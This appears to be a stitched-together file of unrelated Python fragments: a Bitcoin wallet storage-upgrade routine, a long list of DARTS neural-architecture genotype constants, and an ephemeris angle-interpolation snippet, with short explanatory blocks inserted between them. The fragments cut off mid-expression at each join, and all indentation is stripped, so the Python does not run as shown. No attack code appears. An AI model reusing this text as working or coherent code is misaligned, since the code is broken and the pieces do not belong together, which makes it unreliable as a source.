sort_keys=self.output_pretty_json,
cls=util.MyEncoder
)
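`dump` toggles between human-readable and compact JSON with the same two `json.dumps` knobs used above; for example:

```python
import json

data = {'b': 1, 'a': 2}

# Compact form: single line, keys in insertion order.
compact = json.dumps(data, indent=None, sort_keys=False)
# Pretty form: 4-space indent, keys sorted for stable diffs.
pretty = json.dumps(data, indent=4, sort_keys=True)
```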
def load_data(self, s):
try:
self.data = json.loads(s)
except Exception:
try:
d = ast.literal_eval(s)
labels = d.get('labels', {})
except Exception as e:
raise IOError("Cannot read wallet file")
self.data = {}
for key, value in d.items():
try:
json.dumps(key)
json.dumps(value)
except Exception:
self.print_error('Failed to convert label to json format', key)
continue
self.data[key] = value
if not isinstance(self.data, dict):
raise WalletFileException("Malformed wallet file (not dict)")
if not self.manual_upgrades:
if self.requires_split():
raise WalletFileException("This wallet has multiple accounts and must be split")
if self.requires_upgrade():
self.upgrade()
def requires_split(self):
d = self.get('accounts', {})
return len(d) > 1
def split_accounts(self):
result = []
# backward compatibility with old wallets
d = self.get('accounts', {})
if len(d) < 2:
return
wallet_type = self.get('wallet_type')
if wallet_type == 'old':
assert len(d) == 2
data1 = copy.deepcopy(self.data)
data1['accounts'] = {'0': d['0']}
data1['suffix'] = 'deterministic'
data2 = copy.deepcopy(self.data)
data2['accounts'] = {'/x': d['/x']}
data2['seed'] = None
data2['seed_version'] = None
data2['master_public_key'] = None
data2['wallet_type'] = 'imported'
data2['suffix'] = 'imported'
result = [data1, data2]
elif wallet_type in ['bip44', 'trezor', 'keepkey', 'ledger', 'btchip', 'digitalbitbox']:
mpk = self.get('master_public_keys')
for k in d.keys():
bip44_account = int(k)
x = d[k]
if x.get("pending"):
continue
xpub = mpk[f"x/{bip44_account}'"]
new_data = copy.deepcopy(self.data)
# save account, derivation and xpub at index 0
new_data['accounts'] = {'0': x}
new_data['master_public_keys'] = {"x/0'": xpub}
new_data['derivation'] = bip44_derivation_btc(bip44_account)
new_data['suffix'] = k
result.append(new_data)
else:
raise WalletFileException("This wallet has multiple accounts and must be split")
return result
def requires_upgrade(self):
return self.get_seed_version() < FINAL_SEED_VERSION
@profiler
def upgrade(self):
self.print_error('upgrading wallet format')
self.convert_imported()
self.convert_wallet_type()
self.convert_account()
self.convert_version_13_b()
self.convert_version_14()
self.convert_version_15()
self.convert_version_16()
self.convert_version_17()
self.put('seed_version', FINAL_SEED_VERSION) # just to be sure
def convert_wallet_type(self):
if not self._is_upgrade_method_needed(0, 13):
return
wallet_type = self.get('wallet_type')
if wallet_type == 'btchip': wallet_type = 'ledger'
if self.get('keystore') or self.get('x1/') or wallet_type == 'imported':
return False
assert not self.requires_split()
seed_version = self.get_seed_version()
seed = self.get('seed')
xpubs = self.get('master_public_keys')
xprvs = self.get('master_private_keys', {})
mpk = self.get('master_public_key')
keypairs = self.get('keypairs')
key_type = self.get('key_type')
if seed_version == OLD_SEED_VERSION or wallet_type == 'old':
d = {
'type': 'old',
'seed': seed,
'mpk': mpk,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif key_type == 'imported':
d = {
'type': 'imported',
'keypairs': keypairs,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['xpub', 'standard']:
xpub = xpubs["x/"]
xprv = xprvs.get("x/")
d = {
'type': 'bip32',
'xpub': xpub,
'xprv': xprv,
'seed': seed,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['bip44']:
xpub = xpubs["x/0'"]
xprv = xprvs.get("x/0'")
d = {
'type': 'bip32',
'xpub': xpub,
'xprv': xprv,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif wallet_type in ['trezor', 'keepkey', 'ledger', 'digitalbitbox']:
xpub = xpubs["x/0'"]
derivation = self.get('derivation', bip44_derivation_btc(0))
d = {
'type': 'hardware',
'hw_type': wallet_type,
'xpub': xpub,
'derivation': derivation,
}
self.put('wallet_type', 'standard')
self.put('keystore', d)
elif multisig_type(wallet_type):
for key in xpubs.keys():
d = {
'type': 'bip32',
'xpub': xpubs[key],
'xprv': xprvs.get(key),
}
if key == 'x1/' and seed:
d['seed'] = seed
self.put(key, d)
else:
raise WalletFileException('Unable to tell wallet type. Is this even a wallet file?')
# remove junk
self.put('master_public_key', None)
self.put('master_public_keys', None)
self.put('master_private_keys', None)
self.put('derivation', None)
self.put('seed', None)
self.put('keypairs', None)
self.put('key_type', None)
def convert_version_13_b(self):
# version 13 is ambiguous, and has an earlier and a later structure
if not self._is_upgrade_method_needed(0, 13):
return
if self.get('wallet_type') == 'standard':
if self.get('keystore').get('type') == 'imported':
pubkeys = self.get('keystore').get('keypairs').keys()
d = {'change': []}
receiving_addresses = []
for pubkey in pubkeys:
addr = bitcoin.pubkey_to_address('p2pkh', pubkey)
receiving_addresses.append(addr)
d['receiving'] = receiving_addresses
self.put('addresses', d)
self.put('pubkeys', None)
self.put('seed_version', 13)
def convert_version_14(self):
# convert imported wallets for 3.0
if not self._is_upgrade_method_needed(13, 13):
return
if self.get('wallet_type') == 'imported':
addresses = self.get('addresses')
if type(addresses) is list:
addresses = dict([(x, None) for x in addresses])
self.put('addresses', addresses)
elif self.get('wallet_type') == 'standard':
if self.get('keystore').get('type') == 'imported':
addresses = set(self.get('addresses').get('receiving'))
pubkeys = self.get('keystore').get('keypairs').keys()
assert len(addresses) == len(pubkeys)
d = {}
for pubkey in pubkeys:
addr = bitcoin.pubkey_to_address('p2pkh', pubkey)
assert addr in addresses
d[addr] = {
'pubkey': pubkey,
'redeem_script': None,
'type': 'p2pkh'
}
self.put('addresses', d)
self.put('pubkeys', None)
self.put('wallet_type', 'imported')
self.put('seed_version', 14)
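The list-to-dict address normalization in `convert_version_14` is easy to get wrong; a minimal standalone sketch (the helper name and the placeholder addresses are illustrative, not from the wallet code):

```python
# Sketch of the version-14 normalization: a legacy list of imported
# addresses becomes a dict mapping each address to None. The helper name
# and the placeholder addresses below are illustrative only.
def normalize_addresses(addresses):
    if isinstance(addresses, list):
        return {addr: None for addr in addresses}
    return addresses

legacy = ["addr_a", "addr_b"]
print(normalize_addresses(legacy))  # {'addr_a': None, 'addr_b': None}
```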
def convert_version_15(self):
if not self._is_upgrade_method_needed(14, 14):
return
self.put('seed_version', 15)
def convert_version_16(self):
# fixes issue #3193 for imported address wallets
# also, previous versions allowed importing any garbage as an address
# which we now try to remove, see pr #3191
if not self._is_upgrade_method_needed(15, 15):
return
def remove_address(addr):
def remove_from_dict(dict_name):
d = self.get(dict_name, None)
if d is not None:
d.pop(addr, None)
self.put(dict_name, d)
def remove_from_list(list_name):
lst = self.get(list_name, None)
if lst is not None:
s = set(lst)
s -= {addr}
self.put(list_name, list(s))
# note: we don't remove 'addr' from self.get('addresses')
remove_from_dict('addr_history')
remove_from_dict('labels')
remove_from_dict('payment_requests')
remove_from_list('frozen_addresses')
if self.get('wallet_type') == 'imported':
addresses = self.get('addresses')
assert isinstance(addresses, dict)
addresses_new = dict()
for address, details in addresses.items():
if not Address.is_valid(address):
remove_address(address)
continue
if details is None:
addresses_new[address] = {}
else:
addresses_new[address] = details
self.put('addresses', addresses_new)
self.put('seed_version', 16)
def convert_version_17(self):
if not self._is_upgrade_method_needed(16, 16):
return
if self.get('wallet_type') == 'imported':
addrs = self.get('addresses')
if all(v for v in addrs.values()):
self.put('wallet_type', 'imported_privkey')
else:
self.put('wallet_type', 'imported_addr')
def convert_imported(self):
if not self._is_upgrade_method_needed(0, 13):
return
# '/x' is the internal ID for imported accounts
d = self.get('accounts', {}).get('/x', {}).get('imported',{})
if not d:
return False
addresses = []
keypairs = {}
for addr, v in d.items():
pubkey, privkey = v
if privkey:
keypairs[pubkey] = privkey
else:
addresses.append(addr)
if addresses and keypairs:
raise WalletFileException('mixed addresses and privkeys')
elif addresses:
self.put('addresses', addresses)
self.put('accounts', None)
elif keypairs:
self.put('wallet_type', 'standard')
self.put('key_type', 'imported')
self.put('keypairs', keypairs)
self.put('accounts', None)
else:
raise WalletFileException('no addresses or privkeys')
def convert_account(self):
if not self._is_upgrade_method_needed(0, 13):
return
self.put('accounts', None)
def _is_upgrade_method_needed(self, min_version, max_version):
cur_version = self.get_seed_version()
if cur_version > max_version:
return False
elif cur_version < min_version:
raise WalletFileException(
'storage upgrade: unexpected version | |
('sep_conv_3x3', 1),
('skip_connect', 0),
('sep_conv_5x5', 1)],
normal_concat=range(2, 6),
reduce=[('avg_pool_3x3', 0),
('avg_pool_3x3', 1),
('avg_pool_3x3', 0),
('skip_connect', 2),
('skip_connect', 2),
('max_pool_3x3', 0),
('avg_pool_3x3', 0),
('skip_connect', 2)],
reduce_concat=range(2, 6))
PDARTS_TS_CIFAR100_GAMMA_2 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 2), ('skip_connect', 0), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('sep_conv_3x3', 2)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 0), ('avg_pool_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 2), ('avg_pool_3x3', 0), ('sep_conv_5x5', 2), ('avg_pool_3x3', 0), ('sep_conv_5x5', 4)], reduce_concat=range(2, 6))
PDARTS_TS_CIFAR100_GAMMA_3 = Genotype(normal=[('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_5x5', 2), ('sep_conv_3x3', 0), ('dil_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('skip_connect', 0), ('max_pool_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 3), ('dil_conv_3x3', 3), ('dil_conv_3x3', 4)], reduce_concat=range(2, 6))
PDARTS_TS_CIFAR100_GAMMA_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 2), ('skip_connect', 0), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('dil_conv_3x3', 3)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 0), ('dil_conv_5x5', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 2), ('dil_conv_5x5', 2), ('dil_conv_3x3', 3), ('avg_pool_3x3', 0), ('sep_conv_5x5', 2)], reduce_concat=range(2, 6))
PDARTS_TS_CIFAR100_GAMMA_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 2), ('sep_conv_3x3', 1), ('sep_conv_5x5', 4)], normal_concat=range(2, 6), reduce=[('sep_conv_3x3', 0), ('skip_connect', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 2), ('avg_pool_3x3', 0), ('sep_conv_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 2)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_GAMMA_0_5 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('skip_connect', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('max_pool_3x3', 0)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_GAMMA_0_1 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('avg_pool_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_GAMMA_2 = Genotype(normal=[('skip_connect', 0), ('sep_conv_5x5', 1), ('skip_connect', 0), ('skip_connect', 1), ('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 0), ('avg_pool_3x3', 1), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_GAMMA_3 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('dil_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 1), ('avg_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 1), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_LAMBDA_2 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('skip_connect', 0), ('avg_pool_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('avg_pool_3x3', 1), ('skip_connect', 2), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_LAMBDA_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 2), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 1), ('avg_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_LAMBDA_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('skip_connect', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('dil_conv_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 3), ('skip_connect', 2)], reduce_concat=range(2, 6))
DARTS_TS_18_CIFAR10_LAMBDA_3 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('dil_conv_5x5', 1), ('skip_connect', 2), ('avg_pool_3x3', 0), ('avg_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_LAMBDA_3 = Genotype(normal=[('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_5x5', 1), ('dil_conv_3x3', 1), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 1), ('sep_conv_3x3', 2), ('max_pool_3x3', 0), ('sep_conv_5x5', 1), ('dil_conv_3x3', 1), ('dil_conv_3x3', 2)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_LAMBDA_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_5x5', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 3), ('avg_pool_3x3', 0), ('dil_conv_3x3', 1)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_LAMBDA_0_5 = Genotype(normal=[('skip_connect', 0), ('sep_conv_5x5', 1), ('sep_conv_3x3', 0), ('skip_connect', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 3), ('sep_conv_3x3', 0), ('dil_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('skip_connect', 1), ('avg_pool_3x3', 0), ('avg_pool_3x3', 1), ('avg_pool_3x3', 0), ('dil_conv_5x5', 4)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_LAMBDA_2 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_5x5', 2), ('sep_conv_3x3', 0), ('dil_conv_5x5', 4)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('skip_connect', 1), ('avg_pool_3x3', 0), ('sep_conv_5x5', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 2), ('max_pool_3x3', 0), ('dil_conv_3x3', 1)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_AB_1 = Genotype(normal=[('dil_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 3)], normal_concat=range(2, 6), reduce=[('skip_connect', 0), ('dil_conv_5x5', 1), ('avg_pool_3x3', 0), ('skip_connect', 1), ('skip_connect', 0), ('sep_conv_5x5', 2), ('skip_connect', 0), ('sep_conv_3x3', 1)], reduce_concat=range(2, 6))
PDARTS_TS_18_CIFAR100_AB_4 = Genotype(normal=[('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 1), ('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('avg_pool_3x3', 0), ('skip_connect', 1), ('avg_pool_3x3', 0), ('sep_conv_5x5', 2), ('avg_pool_3x3', 0), ('dil_conv_3x3', 1), ('avg_pool_3x3', 0), ('sep_conv_3x3', 4)], reduce_concat=range(2, 6))
coop_cifar10_1 = Genotype(normal=[('sep_conv_5x5', 1), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1), ('sep_conv_5x5', 2), ('sep_conv_5x5', 1), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1), ('sep_conv_3x3', 2)], normal_concat=range(2, 6), reduce=[('sep_conv_3x3', 0), ('max_pool_3x3', 1), ('max_pool_3x3', 1), ('dil_conv_3x3', 0), ('skip_connect', 3), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 2)], reduce_concat=range(2, 6))
coop_cifar10_2 = Genotype(normal=[('dil_conv_5x5', 1), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1), ('dil_conv_3x3', 2), ('sep_conv_5x5', 1), ('dil_conv_5x5', 3), ('sep_conv_5x5', 1), ('sep_conv_5x5', 3)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('dil_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('max_pool_3x3', 0), ('dil_conv_5x5', 4), ('max_pool_3x3', 0)], reduce_concat=range(2, 6))
coop_cifar10_change_1 = Genotype(normal=[('sep_conv_5x5', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('dil_conv_5x5', 2), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1), ('dil_conv_3x3', 4), ('skip_connect', 2)], normal_concat=range(2, 6), reduce=[('skip_connect', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 0), ('dil_conv_5x5', 2), ('sep_conv_5x5', 3), ('max_pool_3x3', 0), ('skip_connect', 1), ('skip_connect', 2)], reduce_concat=range(2, 6))
coop_cifar10_change_2 = Genotype(normal=[('sep_conv_5x5', 1), ('sep_conv_5x5', 0), ('sep_conv_3x3', 1), ('sep_conv_5x5', 0), ('sep_conv_3x3', 1), ('skip_connect', 2), ('dil_conv_3x3', 4), ('sep_conv_3x3', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('dil_conv_5x5', 2), ('skip_connect', 1), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 2), ('max_pool_3x3', 0)], reduce_concat=range(2, 6))
coop_cifar10_change_1_lambda_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('sep_conv_5x5', 1), ('dil_conv_5x5', 2), ('sep_conv_5x5', 0), ('sep_conv_3x3', 2), ('sep_conv_5x5', 0), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('max_pool_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 1), ('skip_connect', 3), ('skip_connect', 4)], reduce_concat=range(2, 6))
coop_cifar10_change_2_lambda_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 0), ('sep_conv_3x3', 3)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('max_pool_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 0)], reduce_concat=range(2, 6))
coop_cifar10_change_1_lambda_2 = Genotype(normal=[('sep_conv_5x5', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 0), ('dil_conv_5x5', 1), ('skip_connect', 0), ('skip_connect', 2), ('sep_conv_5x5', 1), ('skip_connect', 3)], normal_concat=range(2, 6), reduce=[('sep_conv_3x3', 0), ('dil_conv_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('dil_conv_5x5', 3), ('sep_conv_5x5', 0), ('skip_connect', 4), ('skip_connect', 2)], reduce_concat=range(2, 6))
coop_cifar10_change_2_lambda_2 = Genotype(normal=[('sep_conv_5x5', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 1), ('sep_conv_3x3', 2), ('sep_conv_3x3', 1), ('skip_connect', 2), ('skip_connect', 2), ('skip_connect', 4)], normal_concat=range(2, 6), reduce=[('dil_conv_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 0), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 4), ('max_pool_3x3', 0)], reduce_concat=range(2, 6))
coop_cifar10_change_1_lambda_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('skip_connect', 0), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3), ('skip_connect', 2), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
coop_cifar10_change_2_lambda_0_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 1), ('skip_connect', 0)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('max_pool_3x3', 1), ('max_pool_3x3', 0), ('max_pool_3x3', 1), ('skip_connect', 2), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
coop_cifar10_change_1_lambda_3 = Genotype(normal=[('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('skip_connect', 2), ('sep_conv_3x3', 1), ('skip_connect', 2), ('sep_conv_3x3', 0), ('skip_connect', 2), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('sep_conv_5x5', 0), ('dil_conv_5x5', 1), ('sep_conv_3x3', 1), ('avg_pool_3x3', 0), ('max_pool_3x3', 0), ('sep_conv_5x5', 2), ('skip_connect', 4), ('skip_connect', 2)], reduce_concat=range(2, 6))
coop_cifar10_change_2_lambda_3 = Genotype(normal=[('dil_conv_5x5', 1), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('skip_connect', 2), ('sep_conv_5x5', 2), ('sep_conv_3x3', 0), ('skip_connect', 2), ('sep_conv_5x5', 1)], normal_concat=range(2, 6), reduce=[('sep_conv_5x5', 1), ('sep_conv_3x3', 0), ('skip_connect', 2), ('max_pool_3x3', 1), ('skip_connect', 3), ('max_pool_3x3', 1), ('skip_connect', 3), ('skip_connect', 4)], reduce_concat=range(2, 6))
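All of the constants above share one shape. Assuming the standard DARTS definition of `Genotype` (a namedtuple with normal/reduce op lists and concat ranges, which is how DARTS-style code usually defines it), a minimal sketch of that structure:

```python
from collections import namedtuple

# Assumed definition, mirroring the usual DARTS convention.
Genotype = namedtuple("Genotype", "normal normal_concat reduce reduce_concat")

g = Genotype(
    normal=[("sep_conv_3x3", 0), ("sep_conv_3x3", 1),
            ("skip_connect", 0), ("sep_conv_3x3", 2)],
    normal_concat=range(2, 6),
    reduce=[("avg_pool_3x3", 0), ("avg_pool_3x3", 1),
            ("skip_connect", 2), ("max_pool_3x3", 0)],
    reduce_concat=range(2, 6),
)
# Each (op_name, input_node) pair wires one edge of the cell DAG;
# two edges feed each intermediate node.
print(len(g.normal) // 2)  # intermediate nodes wired so far: 2
```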
coop_pretrain_cifar10_1_lambda_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('dil_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('skip_connect', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('avg_pool_3x3', 1), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('avg_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
coop_pretrain_cifar10_2_lambda_0_5 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('sep_conv_3x3', 1), ('skip_connect', 0), ('skip_connect', 1), ('skip_connect', 0), ('skip_connect', 1)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 1), ('max_pool_3x3', 0), ('max_pool_3x3', 0), ('skip_connect', 2), ('dil_conv_5x5', 2), ('skip_connect', 3), ('skip_connect', 2), ('skip_connect', 3)], reduce_concat=range(2, 6))
coop_pretrain_cifar10_1_lambda_1 = Genotype(normal=[('sep_conv_3x3', 0), ('sep_conv_3x3', 1), ('sep_conv_3x3', 0), ('sep_conv_3x3', 2), ('sep_conv_3x3', 0), ('dil_conv_3x3', 2), ('sep_conv_3x3', 0), ('skip_connect', 2)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('dil_conv_3x3', 1), ('max_pool_3x3', 0), ('skip_connect', 2), ('skip_connect', 2), ('dil_conv_3x3', 3), ('skip_connect', 2), ('skip_connect', 0)], reduce_concat=range(2, 6))
coop_pretrain_cifar10_2_lambda_1 = Genotype(normal=[('sep_conv_3x3', 1), ('sep_conv_5x5', 0), ('sep_conv_3x3', 0), ('sep_conv_5x5', 1), ('sep_conv_3x3', 1), ('sep_conv_5x5', 0), ('sep_conv_3x3', 1), ('skip_connect', 0)], normal_concat=range(2, 6), reduce=[('max_pool_3x3', 0), ('sep_conv_3x3', 1), ('dil_conv_5x5', 2), ('skip_connect', 1), ('dil_conv_5x5', 3), ('dil_conv_3x3', 1), ('dil_conv_3x3', 3), | |
2 * np.pi) - np.pi
)
def interpolate_angle(x, xp, yp):
"""
Interpolate an angular quantity on the domain [-pi, pi) while avoiding
discontinuities.
"""
cosy = np.interp(x, xp, np.cos(yp))
siny = np.interp(x, xp, np.sin(yp))
return np.arctan2(siny, cosy)
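A quick illustration (mine, not from the source) of why `interpolate_angle` goes through cos/sin rather than interpolating the angles directly:

```python
import numpy as np

# Two angles only 0.2 rad apart, but on opposite sides of the -pi/pi wrap.
xp = np.array([0.0, 1.0])
yp = np.array([np.pi - 0.1, -np.pi + 0.1])

naive = np.interp(0.5, xp, yp)   # ~0.0: the wrong side of the circle
cosy = np.interp(0.5, xp, np.cos(yp))
siny = np.interp(0.5, xp, np.sin(yp))
wrapped = np.arctan2(siny, cosy)  # ~pi (equivalently -pi): the true midpoint
```

Interpolating the unit-vector components keeps the result on the short arc between the two angles.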
# Inclination of the starry map = 90 - latitude of the central point of
# the observed disc
data["inc"] = interpolate_angle(
times.mjd,
times_jpl.mjd,
np.pi / 2 * u.rad - eph["PDObsLat"].to(u.rad),
).to(u.deg)
# Rotational phase of the starry map is the observer longitude
data["theta"] = (
interpolate_angle(
times.mjd,
times_jpl.mjd,
eph["PDObsLon"].to(u.rad) - np.pi * u.rad,
).to(u.deg)
) + 180 * u.deg
